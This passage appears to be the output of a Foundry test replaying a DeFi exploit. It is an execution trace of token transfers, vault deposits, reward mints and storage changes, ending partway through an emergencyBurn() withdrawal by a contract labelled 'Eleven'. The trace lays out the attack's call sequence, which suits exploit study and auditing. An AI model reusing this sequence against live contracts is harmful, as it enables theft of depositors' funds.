    │   │   │   │   │   @ 0x036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3dcf: 0x0000000000000000000000000000000000000000000000000000003155242243 → 0x0000000000000000000000000000000000000000000000000000003155c406cf
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96088: 0x0000000000000000000000000000000000000000000012ca1af429ab1dc69d72 → 0x0000000000000000000000000000000000000000000012d46399e662fc86ac24
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 189702238376885751474 [1.897e20]
    │   │   │   ├─ [8191] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x4a405F407F603C00599D11788518CEc34bbB4de6, 4723585735584455211 [4.723e18])
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x4a405F407F603C00599D11788518CEc34bbB4de6, value: 4723585735584455211 [4.723e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc1f43a8b16a3480e589df915cab16b0a8f9198c52ee23bbe9198017d38cdbb05: 0x00000000000000000000000000000000000000000000005607f364b9981656a3 → 0x0000000000000000000000000000000000000000000000564980f0ecc3b370ce
    │   │   │   │   │   @ 0x21e97b90a66a50d54b2497da418931efb3db76f3a0a5ba97e3e101e2e4373662: 0x00000000000000000000000000000000000000000000000a48a5bcb7dec00eb2 → 0x00000000000000000000000000000000000000000000000a07183084b322f487
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [788] 0x4a405F407F603C00599D11788518CEc34bbB4de6::chargeFees(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0x6B3C201575aCe5Ed6B67df5c91E40B98c0D2BE36)
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [2541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 26800185215618646297155 [2.68e22]
    │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 184978652641301296263 [1.849e20]
    │   │   │   ├─ [25291] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x2B706F9a9514FADCed91A45Db89486E26a41244A, 184978652641301296263 [1.849e20])
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, value: 184978652641301296263 [1.849e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfa5f5f01161218331ca4976701d3df9464c8805d908d52e08bb2cd3dd06675cf: 0 → 0x00000000000000000000000000000000000000000000000a07183084b322f487
    │   │   │   │   │   @ 0x21e97b90a66a50d54b2497da418931efb3db76f3a0a5ba97e3e101e2e4373662: 0x00000000000000000000000000000000000000000000000a07183084b322f487 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [232348] 0x2B706F9a9514FADCed91A45Db89486E26a41244A::convert(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096)
    │   │   │   │   ├─ [215715] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::depositAll()
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2B706F9a9514FADCed91A45Db89486E26a41244A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 184978652641301296263 [1.849e20]
    │   │   │   │   │   ├─ [19484] 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d::balanceOf() [staticcall]
    │   │   │   │   │   │   ├─ [4705] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::userInfo(2, 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 296293305907598489002202 [2.962e23], 2825040360511287052625636 [2.825e24]
    │   │   │   │   │   │   ├─ [2366] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 22671317185422352347286639 [2.267e25]
    │   │   │   │   │   │   ├─ [2512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 22671318777638437084330638 [2.267e25]
    │   │   │   │   │   │   ├─ [2512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 3999845660126547180 [3.999e18]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000003ebe4f6d11ad8d047575
    │   │   │   │   │   ├─ [2512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [30737] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transferFrom(0x2B706F9a9514FADCed91A45Db89486E26a41244A, 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, 184978652641301296263 [1.849e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, to: 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, value: 184978652641301296263 [1.849e20])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, spender: 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, value: 115792089237316195423570985008687907853269984665640563847182238495391880674745 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xd8bafe1fcf2cde6e0a362c531e20d8700043a6d3a4e7dc003a066a0763e32f81: 0xffffffffffffffffffffffffffffffffffffffffffffd752c2a6175234387240 → 0xffffffffffffffffffffffffffffffffffffffffffffd748bb8de6cd81157db9
    │   │   │   │   │   │   │   @ 0xfa5f5f01161218331ca4976701d3df9464c8805d908d52e08bb2cd3dd06675cf: 0x00000000000000000000000000000000000000000000000a07183084b322f487 → 0
    │   │   │   │   │   │   │   @ 0x186069965408e1110d929d9f04fe22cc501237ec91fabb51377b1eb9a16f070f: 0 → 0x00000000000000000000000000000000000000000000000a07183084b322f487
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 184978652641301296263 [1.849e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, value: 180912906694908170493 [1.809e20])
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 184978652641301296263 [1.849e20]
    │   │   │   │   │   ├─ [6191] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 184978652641301296263 [1.849e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, to: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, value: 184978652641301296263 [1.849e20])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0x00000000000000000000000000000000000000000000000037824e6f903b0cec → 0x00000000000000000000000000000000000000000000000a3e9a7ef4435e0173
    │   │   │   │   │   │   │   @ 0x186069965408e1110d929d9f04fe22cc501237ec91fabb51377b1eb9a16f070f: 0x00000000000000000000000000000000000000000000000a07183084b322f487 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [108275] 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d::deposit()
    │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 188978498301427843443 [1.889e20]
    │   │   │   │   │   │   ├─ [45325] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::enter(188978498301427843443 [1.889e20])
    │   │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 22671318777638437084330638 [2.267e25]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, value: 188978485029389828531 [1.889e20])
    │   │   │   │   │   │   │   ├─ [13637] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transferFrom(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e, 188978498301427843443 [1.889e20])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, to: 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e, value: 188978498301427843443 [1.889e20])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, spender: 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e, value: 115792089237316195423570985008687907853269984665640559866953447798101906954972 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x98d68177c27d5b5adf8e14f141ff1758c211937bc08c43ec932a7f2442efbe49: 0xfffffffffffffffffffffffffffffffffffffffffffc8c7a5792ee809a241c4f → 0xfffffffffffffffffffffffffffffffffffffffffffc8c7018f86f8c56c61adc
    │   │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0x00000000000000000000000000000000000000000000000a3e9a7ef4435e0173 → 0
    │   │   │   │   │   │   │   │   │   @ 0x5d0038da2cacb59f8e8e0c42231de65404b9930270f8183b7bd94fca2633c8c3: 0x00000000000000000000000000000000000000000012c0d6a751c3421fb1fa8e → 0x00000000000000000000000000000000000000000012c0e0e5ec4236630ffc01
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000012c0d69139132a4747cc6f → 0x00000000000000000000000000000000000000000012c0e0cfd3860c67894e22
    │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0 → 0x00000000000000000000000000000000000000000000000a3e9a72e2204181b3
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [444] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::balanceOf(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 188978485029389828531 [1.889e20]
    │   │   │   │   │   │   ├─ [57737] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::deposit(2, 188978485029389828531 [1.889e20])
    │   │   │   │   │   │   │   ├─ [2444] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 22512974075449018597023786 [2.251e25]
    │   │   │   │   │   │   │   ├─ [3709] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::mint(0x3168082c31Dc4B03AC752Fb43d1C3Bf8AE6EE9AE, 160897590000000000 [1.608e17])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3168082c31Dc4B03AC752Fb43d1C3Bf8AE6EE9AE, value: 160897590000000000 [1.608e17])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000003d9bd2538e4d3d8049e99c → 0x0000000000000000000000000000000000000000003d9bd255c9ecbef174859c
    │   │   │   │   │   │   │   │   │   @ 0x05f43f739f075f6aace14647dae5527dd17be3a2b0eefe15c4fdd36febade223: 0x0000000000000000000000000000000000000000000229dafd0125ec3de83dcc → 0x0000000000000000000000000000000000000000000229daff3cc56daf12d9cc
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [3709] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::mint(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 1608975900000000000 [1.608e18])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 1608975900000000000 [1.608e18])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000003d9bd255c9ecbef174859c → 0x0000000000000000000000000000000000000000003d9bd26c1e27cd5d1e9d9c
    │   │   │   │   │   │   │   │   │   @ 0x80bc848f55b8b24f5a83c3458d16fa75c491cae34bbe2c2d38c5062e4b2f62d5: 0x0000000000000000000000000000000000000000000bff4deaad3eedacec6b24 → 0x0000000000000000000000000000000000000000000bff4e010179fc18968324
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 14503826387403622462161700 [1.45e25]
    │   │   │   │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 112182571482734940 [1.121e17])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, value: 112182571482734940 [1.121e17])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0 → 0x000000000000000000000000000000000000000000000000018e8d745337e15c
    │   │   │   │   │   │   │   │   │   @ 0x80bc848f55b8b24f5a83c3458d16fa75c491cae34bbe2c2d38c5062e4b2f62d5: 0x0000000000000000000000000000000000000000000bff4e010179fc18968324 → 0x0000000000000000000000000000000000000000000bff4dff72ec87c55ea1c8
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [13459] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::transferFrom(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 188978485029389828531 [1.889e20])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 188978485029389828531 [1.889e20])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, spender: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 115792089237316195423570985008687907853269984665640559866953474083352948620970 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0x00000000000000000000000000000000000000000000000a3e9a72e2204181b3 → 0
    │   │   │   │   │   │   │   │   │   @ 0x80bc848f55b8b24f5a83c3458d16fa75c491cae34bbe2c2d38c5062e4b2f62d5: 0x000000000000000000000000000000000000000000129f4ec524542b8498a02a → 0x000000000000000000000000000000000000000000129f5903bec70da4da21dd
    │   │   │   │   │   │   │   │   │   @ 0x17e84f37568429749640c1f17c62169e6f8d0b2c7da71cc88d878be7c7a4e945: 0xfffffffffffffffffffffffffffffffffffffffffffc8c7a57f044ba6233405d → 0xfffffffffffffffffffffffffffffffffffffffffffc8c701955d1d841f1beaa
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ emit Deposit(user: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, pid: 2, amount: 188978485029389828531 [1.889e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x55a3e97a38f959a6dfdb5f04f11a2f5e46de051ebe2bde60aa73ecbd934e060d: 0x000000000000000000000000000000000000000000025639beabf3b2dd8a66e4 → 0x00000000000000000000000000000000000000000002569b6db8fde55332210e
    │   │   │   │   │   │   │   │   @ 0x05f43f739f075f6aace14647dae5527dd17be3a2b0eefe15c4fdd36febade223: 0x0000000000000000000000000000000000000000000229dafd0125ec3de83dcc → 0x0000000000000000000000000000000000000000000229daff3cc56daf12d9cc
    │   │   │   │   │   │   │   │   @ 0x17e84f37568429749640c1f17c62169e6f8d0b2c7da71cc88d878be7c7a4e945: 0xfffffffffffffffffffffffffffffffffffffffffffc8c7a57f044ba6233405d → 0xfffffffffffffffffffffffffffffffffffffffffffc8c701955d1d841f1beaa
    │   │   │   │   │   │   │   │   @ 0x55a3e97a38f959a6dfdb5f04f11a2f5e46de051ebe2bde60aa73ecbd934e060c: 0x000000000000000000000000000000000000000000003ebe17a0d5bf0c7ba0da → 0x000000000000000000000000000000000000000000003ec8563b48a12cbd228d
    │   │   │   │   │   │   │   │   @ 0x036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3dbb: 0x000000000000000000000000000000000000000000000000000008abf2e87d2d → 0x000000000000000000000000000000000000000000000000000008abf2e99459
    │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0 → 0x000000000000000000000000000000000000000000000000018e8d745337e15c
    │   │   │   │   │   │   │   │   @ 0x036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3dba: 0x0000000000000000000000000000000000000000000000000000000000822c0f → 0x0000000000000000000000000000000000000000000000000000000000822c1d
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Deposited(: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, : 184978652641301296263 [1.849e20], : 8530973 [8.53e6])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000003d5d449e9ef4d9143bae → 0x000000000000000000000000000000000000000000003d67134a6113ea780cab
    │   │   │   │   │   │   @ 0xfa5f5f01161218331ca4976701d3df9464c8805d908d52e08bb2cd3dd06675cf: 0 → 0x000000000000000000000000000000000000000000000009ceabc21f1163d0fd
    │   │   │   │   │   │   @ 0xd8bafe1fcf2cde6e0a362c531e20d8700043a6d3a4e7dc003a066a0763e32f81: 0xffffffffffffffffffffffffffffffffffffffffffffd752c2a6175234387240 → 0xffffffffffffffffffffffffffffffffffffffffffffd748bb8de6cd81157db9
    │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0x00000000000000000000000000000000000000000000000037824e6f903b0cec → 0x00000000000000000000000000000000000000000000000a3e9a7ef4435e0173
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x2B706F9a9514FADCed91A45Db89486E26a41244A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 180912906694908170493 [1.809e20]
    │   │   │   │   ├─ [6330] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 180912906694908170493 [1.809e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 180912906694908170493 [1.809e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfa5f5f01161218331ca4976701d3df9464c8805d908d52e08bb2cd3dd06675cf: 0x000000000000000000000000000000000000000000000009ceabc21f1163d0fd → 0
    │   │   │   │   │   │   @ 0x21e97b90a66a50d54b2497da418931efb3db76f3a0a5ba97e3e101e2e4373662: 0x0000000000000000000000000000000000000000000005acd7489c2369044a43 → 0x0000000000000000000000000000000000000000000005b6a5f45e427a681b40
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x55a3e97a38f959a6dfdb5f04f11a2f5e46de051ebe2bde60aa73ecbd934e060d: 0x000000000000000000000000000000000000000000025639beabf3b2dd8a66e4 → 0x00000000000000000000000000000000000000000002569b6db8fde55332210e
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 26981098122313554467648 [2.698e22]
    │   │   │   ├─ [25476] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transferFrom(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 411515297079048812211459 [4.115e23])
    │   │   │   ├─ [537] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 411515297079048812211459 [4.115e23]
    │   │   │   ├─ [20444] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::deposit(7, 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14503826275221050979426760 [1.45e25]
    │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [6376] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transferFrom(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 411515297079048812211459 [4.115e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 411515297079048812211459 [4.115e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0
    │   │   │   │   │   │   @ 0x04388ded71c3fdb0b45ba89e3133076dba6a5c4da99ee2a8f73fa78097ba49f9: 0x00000000000000000000000000000000000000000004431a9069c7a9e5ba2968 → 0x000000000000000000000000000000000000000000049a3eda62bf92356fd66b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Deposit(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 7, amount: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96087: 0x0000000000000000000000000000000000000000000058dd3d916496c9ffa259 → 0x00000000000000000000000000000000000000000000b001878a5c7f19b54f5c
    │   │   │   │   │   @ 0x04388ded71c3fdb0b45ba89e3133076dba6a5c4da99ee2a8f73fa78097ba49f9: 0x00000000000000000000000000000000000000000004431a9069c7a9e5ba2968 → 0x000000000000000000000000000000000000000000049a3eda62bf92356fd66b
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96088: 0x0000000000000000000000000000000000000000000012d46399e662fc86ac24 → 0x00000000000000000000000000000000000000000000254b58096cb4bafd343d
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Deposited(: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 411515297079048812211459 [4.115e23], : 8530973 [8.53e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfa5f5f01161218331ca4976701d3df9464c8805d908d52e08bb2cd3dd06675cf: 0 → 0x00000000000000000000000000000000000000000000000a07183084b322f487
    │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 0 → 0x00000000000000000000000000000000000000000000115120a3a1ed94d3d202
    │   │   │   │   @ 0xc43a18728dee70c1cf76a513eef739350a6e2b673f21a950d1ef74884d13ae6e: 0 → 0x00000000000000000000000000000000000000000002186828da50d33e794120
    │   │   │   │   @ 0xc1f43a8b16a3480e589df915cab16b0a8f9198c52ee23bbe9198017d38cdbb05: 0x00000000000000000000000000000000000000000000005607f364b9981656a3 → 0x0000000000000000000000000000000000000000000000564980f0ecc3b370ce
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000000002e2b010e5b → 0x0000000000000000000000000000000000000000000000000000002e44b331bf
    │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96088: 0x0000000000000000000000000000000000000000000012d46399e662fc86ac24 → 0x00000000000000000000000000000000000000000000254b58096cb4bafd343d
    │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000058dd3d916496c9ffa259 → 0x00000000000000000000000000000000000000000000b001878a5c7f19b54f5c
    │   │   │   └─ ← [Stop]
    │   │   ├─ [63241] 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8::emergencyBurn()
    │   │   │   ├─ [537] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [34448] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::withdraw(7, 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14503826275221050979426760 [1.45e25]
    │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
